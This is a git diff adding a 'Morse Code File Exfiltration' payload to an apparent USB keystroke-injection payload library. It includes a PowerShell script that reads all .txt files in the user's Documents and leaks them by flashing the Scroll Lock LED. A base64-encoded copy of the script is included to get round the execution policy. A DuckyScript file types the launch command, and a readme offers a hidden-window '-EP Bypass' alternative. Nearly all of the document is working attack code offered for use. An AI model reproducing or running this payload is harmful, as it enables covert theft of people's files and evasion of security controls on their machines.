diff --git a/payloads/library/exfiltration/Win_PoSH_MorseCode/MorseCodeFileExfiltration.ps1 b/payloads/library/exfiltration/Win_PoSH_MorseCode/MorseCodeFileExfiltration.ps1 new file mode 100644 index 0000000..3af4309 --- /dev/null +++ b/payloads/library/exfiltration/Win_PoSH_MorseCode/MorseCodeFileExfiltration.ps1 @@ -0,0 +1,32 @@ +$o = New-Object -com wscript.shell; +$h = @{ "1"="39999"; "2"="33999"; "3"="33399"; "4"="33339"; "5"="33333"; "6"="93333"; "7"="99333"; "8"="99933"; "9"="99993"; "0"="99999"; "A"="39"; "B"="9333"; "C"="9393"; "D"="933"; "E"="3"; "F"="3393"; "G"="993"; "H"="3333"; "I"="33"; "J"="3999"; "K"="939"; "L"="3933"; "M"="99"; "N"="93"; "O"="999"; "P"="3993"; "Q"="9939"; "R"="393"; "S"="333"; "T"="9"; "U"="339"; "V"="3339"; "W"="399"; "X"="9339"; "Y"="9399"; "Z"="9933" }; +$l = '{SCROLLLOCK}'; +function flashy($t){ + $o.SendKeys($l); + sleep -m ([int]$t); + $o.SendKeys($l); + #[console]::beep(600,([int]$t)); + sleep -m 300; +} +gci ([Environment]::GetFolderPath('MyDocuments')) -file -r *.txt | % { gc($_.FullName).ToUpper()} | % {$_[0..($_.length)]} | % { + $v = $h[[string]$_]; + if ($v) + { + $v| % {$_[0..($_.length)]} | % { + flashy((([int]([string]$_))*100)); + } + } + elseif ((!$v) -and !(([int]$_) -eq 32)) + { + flashy(2700); + $v = ([string]([int]$_)); + $v| % {$_[0..($_.length)]} | % { + $h[[string]$_] | % {$_[0..($_.length)]} | % { + flashy((([int]([string]$_))*100)); + } + } + }else{ + sleep -m 1200; + } + sleep -m 600; + } \ No newline at end of file diff --git a/payloads/library/exfiltration/Win_PoSH_MorseCode/b.txt b/payloads/library/exfiltration/Win_PoSH_MorseCode/b.txt new file mode 100644 index 0000000..4f14daf --- /dev/null +++ b/payloads/library/exfiltration/Win_PoSH_MorseCode/b.txt @@ -0,0 +1 @@ +JABvACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAdwBzAGMAcgBpAHAAdAAuAHMAaABlAGwAbAA7ACAAJABoACAAPQAgAEAAewAgACIAMQAiAD0AIgAzADkAOQA5ADkAIgA7ACAAIgAyACIAPQAiADMAMwA5ADkAOQAiADsAIAAiADMAIgA9ACIAMwAzADMAOQA5ACIAOwAgACIANAAiAD0AIgAzADMAMwAzADkAIgA7ACAAIgA1ACIAPQAiADMAMwAzADMAMwAiADsAIAAiADYAIgA9ACIAOQAzADMAMwAzACIAOwAgACIANwAiAD0AIgA5ADkAMwAzADMAIgA7ACAAIgA4ACIAPQAiADkAOQA5ADMAMwAiADsAIAAiADkAIgA9ACIAOQA5ADkAOQAzACIAOwAgACIAMAAiAD0AIgA5ADkAOQA5ADkAIgA7ACAAIgBBACIAPQAiADMAOQAiADsAIAAiAEIAIgA9ACIAOQAzADMAMwAiADsAIAAiAEMAIgA9ACIAOQAzADkAMwAiADsAIAAiAEQAIgA9ACIAOQAzADMAIgA7ACAAIgBFACIAPQAiADMAIgA7ACAAIgBGACIAPQAiADMAMwA5ADMAIgA7ACAAIgBHACIAPQAiADkAOQAzACIAOwAgACIASAAiAD0AIgAzADMAMwAzACIAOwAgACIASQAiAD0AIgAzADMAIgA7ACAAIgBKACIAPQAiADMAOQA5ADkAIgA7ACAAIgBLACIAPQAiADkAMwA5ACIAOwAgACIATAAiAD0AIgAzADkAMwAzACIAOwAgACIATQAiAD0AIgA5ADkAIgA7ACAAIgBOACIAPQAiADkAMwAiADsAIAAiAE8AIgA9ACIAOQA5ADkAIgA7ACAAIgBQACIAPQAiADMAOQA5ADMAIgA7ACAAIgBRACIAPQAiADkAOQAzADkAIgA7ACAAIgBSACIAPQAiADMAOQAzACIAOwAgACIAUwAiAD0AIgAzADMAMwAiADsAIAAiAFQAIgA9ACIAOQAiADsAIAAiAFUAIgA9ACIAMwAzADkAIgA7ACAAIgBWACIAPQAiADMAMwAzADkAIgA7ACAAIgBXACIAPQAiADMAOQA5ACIAOwAgACIAWAAiAD0AIgA5ADMAMwA5ACIAOwAgACIAWQAiAD0AIgA5ADMAOQA5ACIAOwAgACIAWgAiAD0AIgA5ADkAMwAzACIAIAB9ADsAIAAkAGwAIAA9ACAAJwB7AFMAQwBSAE8ATABMAEwATwBDAEsAfQAnADsAIABmAHUAbgBjAHQAaQBvAG4AIABmAGwAYQBzAGgAeQAoACQAdAApAHsAIAAgACAAIAAgACAAIAAgACAAJABvAC4AUwBlAG4AZABLAGUAeQBzACgAJABsACkAOwAgACAAIAAgACAAcwBsAGUAZQBwACAALQBtACAAKABbAGkAbgB0AF0AJAB0ACkAOwAgACAAIAAgACAAJABvAC4AUwBlAG4AZABLAGUAeQBzACgAJABsACkAOwAgACAAIAAgACAAcwBsAGUAZQBwACAALQBtACAAMwAwADAAOwAgAH0AIABnAGMAaQAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoARwBlAHQARgBvAGwAZABlAHIAUABhAHQAaAAoACcATQB5AEQAbwBjAHUAbQBlAG4AdABzACcAKQApACAALQBmAGkAbABlACAALQByACAAKgAuAHQAeAB0ACAAfAAgACUAIAB7ACAAZwBjACgAJABfAC4ARgB1AGwAbABOAGEAbQBlACkALgBUAG8AVQBwAHAAZQByACgAKQB9ACAAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACQAdgAgAD0AIAAkAGgAWwBbAHMAdAByAGkAbgBnAF0AJABfAF0AOwAgACAAIAAgACAAaQBmACAAKAAkAHYAKQAgACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAkAHYAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABmAGwAYQBzAGgAeQAoACgAKABbAGkAbgB0AF0AKABbAHMAdAByAGkAbgBnAF0AJABfACkAKQAqADEAMAAwACkAKQA7ACAAIAAgACAAIAAgACAAIAAgAH0AIAAgACAAIAAgAH0AIAAgACAAIAAgAGUAbABzAGUAaQBmACAAKAAoACEAJAB2ACkAIAAtAGEAbgBkACAAIQAoACgAWwBpAG4AdABdACQAXwApACAALQBlAHEAIAAzADIAKQApACAAIAAgACAAIAB7ACAAIAAgACAAIAAgACAAIAAgAGYAbABhAHMAaAB5ACgAMgA3ADAAMAApADsAIAAgACAAIAAgACAAIAAgACAAJAB2ACAAPQAgACgAWwBzAHQAcgBpAG4AZwBdACgAWwBpAG4AdABdACQAXwApACkAOwAgACAAIAAgACAAIAAgACAAIAAkAHYAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGgAWwBbAHMAdAByAGkAbgBnAF0AJABfAF0AIAB8ACAAJQAgAHsAJABfAFsAMAAuAC4AKAAkAF8ALgBsAGUAbgBnAHQAaAApAF0AfQAgAHwAIAAlACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAZgBsAGEAcwBoAHkAKAAoACgAWwBpAG4AdABdACgAWwBzAHQAcgBpAG4AZwBdACQAXwApACkAKgAxADAAMAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0AIAAgACAAIAAgACAAIAAgACAAfQAgACAAIAAgACAAfQBlAGwAcwBlAHsAIAAgACAAIAAgACAAIAAgACAAIABzAGwAZQBlAHAAIAAtAG0AIAAxADIAMAAwADsAIAAgACAAIAAgAH0AIAAgACAAIAAgAHMAbABlAGUAcAAgAC0AbQAgADYAMAAwADsAIAAgAH0A \ No newline at end of file diff --git a/payloads/library/exfiltration/Win_PoSH_MorseCode/payload.txt b/payloads/library/exfiltration/Win_PoSH_MorseCode/payload.txt new file mode 100644 index 0000000..b25aaa7 --- /dev/null +++ b/payloads/library/exfiltration/Win_PoSH_MorseCode/payload.txt @@ -0,0 +1,60 @@ +REM Title: Morse Code File Exfiltration +REM Description: Reads all txt files in myDocs and Flashes the Scrolllock on and off to represent morse code +REM Author: Cribbit +REM Version: 1.2 +REM Category: Exfiltration +REM Target: Windows (Powershell 5.1+) +REM Attackmodes: HID & STORAGE +REM Note: For characters outside the Morse code 0..9 A..Z it now flash one long pulse then the chars ordinal value i.e. (@ = 64 = -.... ....-) +ATTACKMODE HID STORAGE + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.0 + + REM Windows fully passive OS Detection and passive Detect Ready + REM Includes its own passive detect ready. Does not require + REM additional extensions + + REM USAGE: + REM Extension runs inline (here) + REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic + REM boot delay + REM $_OS will be set to WINDOWS or NOT_WINDOWS + + REM CONFIGURATION: + DEFINE MAX_WAIT 150 + DEFINE CHECK_INTERVAL 20 + DEFINE WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE NOT_WINDOWS 7 + + VAR $MAX_TRIES = MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + ELSE + $_OS = NOT_WINDOWS + END_IF + + REM EXAMPLE USAGE AFTER EXTENSION + REM IF ($_OS == WINDOWS) THEN + REM STRING HELLO WINDOWS! + REM ELSE + REM STRING HELLO WORLD! + REM END_IF +END_EXTENSION + + +IF ($_OS == WINDOWS) + LED_GREEN + REM Give explorer time to show + DELAY 2000 + GUI r + DELAY 200 + STRINGLN powershell .(powershell.exe -encodedCommand (gc((gwmi win32_volume -f 'label=''DUCKY''').Name+'\b.txt'))) +ELSE + LED_RED +END_IF + diff --git a/payloads/library/exfiltration/Win_PoSH_MorseCode/readme.md b/payloads/library/exfiltration/Win_PoSH_MorseCode/readme.md new file mode 100644 index 0000000..d295985 --- /dev/null +++ b/payloads/library/exfiltration/Win_PoSH_MorseCode/readme.md @@ -0,0 +1,26 @@ +# :flashlight: Morse Code File Exfiltration +* Author: Cribbit +* Version: 1.2 +* Target: Windows (Powershell 5.1+) +* Category: Exfiltration +* Attackmode: HID & Storage + +## :book: Description +Reads all txt files in "my documents" and flashes the scroll lock on and off to represent Morse code of the English alphanumeric characters (0..9 A..Z) +For characters outside the Morse code 0..9 A..Z it now flash one long pulse then the chars ordinal value i.e. (@ = 64 = -.... ....-) + +## :musical_note: Note +This is not a very useful payload with limitation of morse code but I thought it was fun to create. + +The payload uses a base64 encode version of the payload (b.txt) to get round the Script Execution Policy. There is a non-base64 version in the file (MorseCodeFileExfiltration.ps1) so you can see what it is doing. + +Please check the encoded payload before execution, to make sure it has not been replaced with something more malicious. + +If you do not want to use the base64 version you could change the payload to: +`RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''DUCKY''').Name+'payloads\\$SWITCH_POSITION\MorseCodeFileExfiltration.ps1')"` + + +## :page_facing_up: Change Log +| Version | Changes | +| ------- | ------------------------------| +| 1.2 | Ported from BashBunny Repo |